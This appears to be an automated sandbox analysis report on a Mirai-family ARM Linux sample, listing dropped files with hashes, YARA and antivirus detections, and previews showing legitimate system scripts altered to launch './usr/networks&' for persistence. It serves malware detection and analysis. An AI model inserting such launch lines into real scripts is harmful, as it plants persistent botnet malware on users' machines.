                                                                  SHA1:5E7EC0275CA63E162238FE7A6AD7FD7485372427
                                                                  SHA-256:9FF9646A48EE08E9A11D2653EDA13902B68BF4B429996184C21B1E67980D2980
                                                                  SHA-512:841436B650B083FD4CFF76CBCDFE471F79A0F9EC26F43537BBBA1136769884338A9DC869AF81EEE289CCB6101375945877BA3E71F994E9925D99B1793CB6FD5B
                                                                  Malicious:false
                                                                  Preview:2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1914
                                                                  Entropy (8bit):4.829445473341419
                                                                  Encrypted:false
                                                                  SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                  MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                  SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                  SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                  SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                  Malicious:true
                                                                  Preview:./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):37310
                                                                  Entropy (8bit):4.959652179113969
                                                                  Encrypted:false
                                                                  SSDEEP:768:Y2l/oQ5nj2Zuv9pPOkUNW58rhUpm/AHgf7AN/0KK0SAQiAlcYm/qr6HZtda9Ts5w:Y2l/oQFj2Zuv9pPmNW58rhUpm/AHgf7H
                                                                  MD5:4C8E78D6A4073616C23D20694FDED604
                                                                  SHA1:4C22CE08AE9B9C3409D48F83874113765CCF819C
                                                                  SHA-256:BC8CFDD1A1E411786C084CD7674D81899506C9059F65E181AACA1185AD0573D1
                                                                  SHA-512:6D80B1A699BE6B8A881989FE42253594DA849B7D4CDA7073E614E9C4DEA828A0E795962CAB736D82A94AD159525219477561050A3897A7D9D2DAD2E1181DD21A
                                                                  Malicious:true
                                                                  Preview:./usr/networks&. exit 1;. fi. # Not necessary just use double quotes around variable to preserve new lines. #hosts=`echo $hosts | tr ' ' '\n'`.}..# Return hosts. /proc/scsi/HOSTADAPTER/? must exist.findhosts ().{. hosts=. for driverdir in /proc/scsi/*; do. driver=${driverdir#/proc/scsi/}. if test $driver = scsi -o $driver = sg -o $driver = dummy -o $driver = device_info; then continue; fi. for hostdir in $driverdir/*; do. name=${hostdir#/proc/scsi/*/}. if test $name = add_map -o $name = map -o $name = mod_parm; then continue; fi. num=$name. driverinfo=$driver. if test -r "$hostdir/status"; then. num=$(printf '%d\n' "$(sed -n 's/SCSI host number://p' "$hostdir/status")"). driverinfo="$driver:$name". fi. hosts="$hosts $num". echo "Host adapter $num ($driverinfo) found.". done. done.}..printtype ().{. local type=$1.. case "$type" in. 0) echo "Direct-Access" ;;. 1) echo "Sequential-Access" ;;. 2) echo "Pr
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                  Category:dropped
                                                                  Size (bytes):307960
                                                                  Entropy (8bit):5.819759780885281
                                                                  Encrypted:false
                                                                  SSDEEP:6144:T2s/gAWNboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW/UmJqBxAuaPRhVabEDSDP99zBT
                                                                  MD5:08B9C0CCE72BE9D0593FB14D67780BFF
                                                                  SHA1:BBA44D9DC631607564FBDD7483361099F5BB55E7
                                                                  SHA-256:72B9F5286030EA745A84F0B10E7650E13CA9F77A8A6C1FB6F2E30C7ACF04FA9F
                                                                  SHA-512:DAA27ADF767DEDA522C9A55CB2C52FEC7E97A61C8D1E48DFB3837C0836CF6EE84CE2B1093443F2325E543275F91A5248B79FDF19407C0917F81A895B81F13752
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                  • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                  • Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                  • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Mirai_5c62e6b2, Description: unknown, Source: /usr/networks, Author: unknown
                                                                  • Rule: Linux_Trojan_Mirai_77137320, Description: unknown, Source: /usr/networks, Author: unknown
                                                                  • Rule: Linux_Trojan_Mirai_ac253e4f, Description: unknown, Source: /usr/networks, Author: unknown
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                  Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):47
                                                                  Entropy (8bit):3.90242960796693
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vvLQVOORgn:uTn
                                                                  MD5:DF2ACF286726B02D483BEF86C91F7FA8
                                                                  SHA1:9E6A2422A7C3FBC0FCB34D314AF55D1452489DF0
                                                                  SHA-256:7BD4E13877E1F1E9AA5729AC8AF468E0C660DBCCADEF25C67DA99DE49F7AE549
                                                                  SHA-512:E99CFC15E6638CB9DA788C4B5744FF2170E183DC2A271847931E1C991C2D9049D1FF9C4EF49D7A7A348EE24DD994C0EA7048CDC4E6245930279F6A79E69312B9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text, with very long lines (379)
                                                                  Category:dropped
                                                                  Size (bytes):25464
                                                                  Entropy (8bit):5.453877096685684
                                                                  Encrypted:false
                                                                  SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                  MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                  SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                  SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                  SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4725
                                                                  Entropy (8bit):5.44928341819888
                                                                  Encrypted:false
                                                                  SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                  MD5:B4F115765D68E40BEBB845FA7F437539
                                                                  SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                  SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                  SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):11664
                                                                  Entropy (8bit):5.539741046843357
                                                                  Encrypted:false
                                                                  SSDEEP:192:4RRRNryQ7F6avUvZswuHZkzTm8arUeo0vq2yS7b1KYMe7H/6:XQ7F61swuHZ6m8feNq2yDYMEH/6
                                                                  MD5:1B1A8B842BC45126EC5B709423446B59
                                                                  SHA1:99A49AE47721C62FE7659B23485AA3464B76CEC3
                                                                  SHA-256:E0FDE03C3CF51CA06A2F393BA43C4060AA0B52DDF96CDEE5F770ABC978CF49D0
                                                                  SHA-512:07DDD8C5C68B6510E12D14FCA6086E5AB0D42D0D4FA9084D53CC368172BB8847B05A1040CB787A2F489B1C35A443C8920074F2F6F95106B73C9185141555D226
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..# Printing options: number of copies and page ranges.[ -z "$NB" ] && NB=1.PAGERANGES=$(getOption page-ranges)..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3399
                                                                  Entropy (8bit):5.296419005515725
                                                                  Encrypted:false
                                                                  SSDEEP:96:QWswTl5TVnavmj+iHgvy/pHJvyWEz2a77:Zs4fVna9eKz2E
                                                                  MD5:6CA46C23DC6233BE77F0FD904C493D83
                                                                  SHA1:674B36A91CB4B815E3657F3060C88BC4EB071C95
                                                                  SHA-256:4E211F67F09E4E37EBB63EA30570A4E623ED1A185F0CCBB947104BF6775E04AA
                                                                  SHA-512:AC68CCEC39B7E40C7BD8982DA57F53D95CA5839591DC1A0368AEC531A0D905602D876CF830792138AC070BE897E2893DA2C3CA3F268DB81A0BCC1843E9C7B262
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.[ $? = 0 ] || exit 1.DUPLEX=$(getOption Duplex).[ -n "$DUPLEX" ] || DUPLEX=None.ZFOLDING=$(getOption ZFolding).[ -n "$ZFOLDING" ] || ZFOLDING=False.SIDEWAYS=$(getOption SideWays).[ -n "$SIDEWAYS" ] || SIDEWAYS=False.SADDLESTITCH=$(getOption SaddleStitch).[ -n "$SADDLESTITCH" ] || SADDLESTITCH=False.TABLE=$(getOptionNumber IndexTable).[ $? = 0 ] || exit 1.MULTIPLEIMPACT=$(getOptionNumber IndexMultipleImpact).[ $? = 0 ] || exit 1.HWPAGENUMBER=$(getOption HardwarePageNumber)..# Convert from 100th of mm to Inch fraction.mmToIndexIn () {. # 100th of mm. MM=$1.. # 120th of inches. IN120=$(($MM * 12 / 254)).. # Integer part. INT=$(($IN120 / 120 )).. # Fractional part, first in 120th of inch. FRAC=$(($IN120 % 120)).. # Convert to Index-specific values. if [ $FRAC -lt 30 ]; then. # Round down to zero. FRAC=0. elif [ $FRAC -ge 30 -a $FRAC -lt 40 ]; then. # Round down to a quarter. FRAC=1. elif [ $FRAC -ge 40 -a $FRAC -lt 60 ]; then. # Round down to a
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1587
                                                                  Entropy (8bit):5.05148558164496
                                                                  Encrypted:false
                                                                  SSDEEP:48:yvwpsuotO0I1cCkS+DYLYWYZ3rwi+BKjg/D+RJSW9L:Cfzo+SXEA7eSWV
                                                                  MD5:110002C4A9588D6E696253D0DE3C9978
                                                                  SHA1:C3C1B6798FD324BE31D732FFEFA1C7D7C5382F22
                                                                  SHA-256:91B0701CA62899B36DFEE8458643FA6DBEA36BB838C3E3C1C9E1DC6717F10BA8
                                                                  SHA-512:2DA3BA7043DF2C78BAB6435010040FA44EFE774C687165CCB91DA124E25C8D6C41CDBD50B25276AF21D18E3F31DAE4232DBF93E78B9363ECA133E7CB74AD7BD6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. case "$PAPERLENGTH" in. In). INIT+=,PW$(mmToIndexIn $PAGEWIDTH),PL$(mmToIndexIn $PAGEHEIGHT). ;;. Mm). INIT+=,PW$(($PAGEWIDTH / 100)),PL$(($PAGEHEIGHT / 100)). ;;. *) ;;. esac.. case $LINESPACING in. 250) INIT+=,LS0 ;;. 375) INIT+=,LS1 ;;. 450) INIT+=,LS2 ;;. 475) INIT+=,LS3 ;;. 500) INIT+=,LS4 ;;. 525) INIT+=,LS5 ;;. 550) INIT+=,LS6 ;;. 750) INIT+=,LS7 ;;. 1000) INIT+=,LS8 ;;. *). if [ $FIRMWARE -lt 120130 ]. then..echo "ERROR: unsupported $LINESPACING line spacing, please upgrade firmware to at least 12.01.3" >&2..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1055
                                                                  Entropy (8bit):5.0066328703681355
                                                                  Encrypted:false
                                                                  SSDEEP:24:a8seltmT9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:hs6tSDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                  MD5:E43BA2CA058B0AAC31BDF024BEE7ABE6
                                                                  SHA1:C78B616DBE567DCE177DA3553702F2FDCBEC07E8
                                                                  SHA-256:BF15B97CF5C1CD1D078ECF5B9B2454E6E95AC314AE6B0808AD093EFDF5508197
                                                                  SHA-512:AC9AC10BA0E853CF70AE2239710A9F7A661D604F0125150C72963461874C497FC2C4BCD8B42E15C062A77DB2BD8D0F2F7E6053CDAB7113CC31FCAC7F65F95724
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. INIT+=,CH$PRINTABLETEXTWIDTH,LP$PRINTABLETEXTHEIGHT.. case $LINESPACING in. 500) INIT+=,LS50 ;;. 1000) INIT+=,LS100 ;;. *). echo "ERROR: unsupported $LINESPACING line spacing" >&2. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1816
                                                                  Entropy (8bit):4.732022360765176
                                                                  Encrypted:false
                                                                  SSDEEP:48:8MTeMn/zV5rh/1RzUKHjuuOGp2fVU6GjJN+V4ATo+aZ+:heCrhXH+DfVpmhC/
                                                                  MD5:1851CA5690400777129B4D3C6B58D4D2
                                                                  SHA1:5AB880AE743FB6EA929BF372A64B9689BD7D660F
                                                                  SHA-256:75DECCF74010FCBCF95DB88A5885700E743EA339EE2C8DB44D80D97403E30443
                                                                  SHA-512:61986E49AFA511BFA970B3C781B3E7FB2F43546A01B167F45D1769A958A5EEFCEFA37089BD738EDD2BB2BCB1A3C0500FABF49EF39DA5F226A2B5C44698CA52CC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-support's '/usr/share/acpi-support/policy-funcs' file...getXconsole.PMS="gnome-power-manager kpowersave xfce4-power-manager".PMS="$PMS guidance-power-m
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):309
                                                                  Entropy (8bit):4.972882784760757
                                                                  Encrypted:false
                                                                  SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                  MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                  SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                  SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                  SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3647
                                                                  Entropy (8bit):4.544491450799858
                                                                  Encrypted:false
                                                                  SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                  MD5:734F4010B22A9F64DBCCED57155A6396
                                                                  SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                  SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                  SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:awk or perl script, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1829
                                                                  Entropy (8bit):4.38604786798686
                                                                  Encrypted:false
                                                                  SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                  MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                  SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                  SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
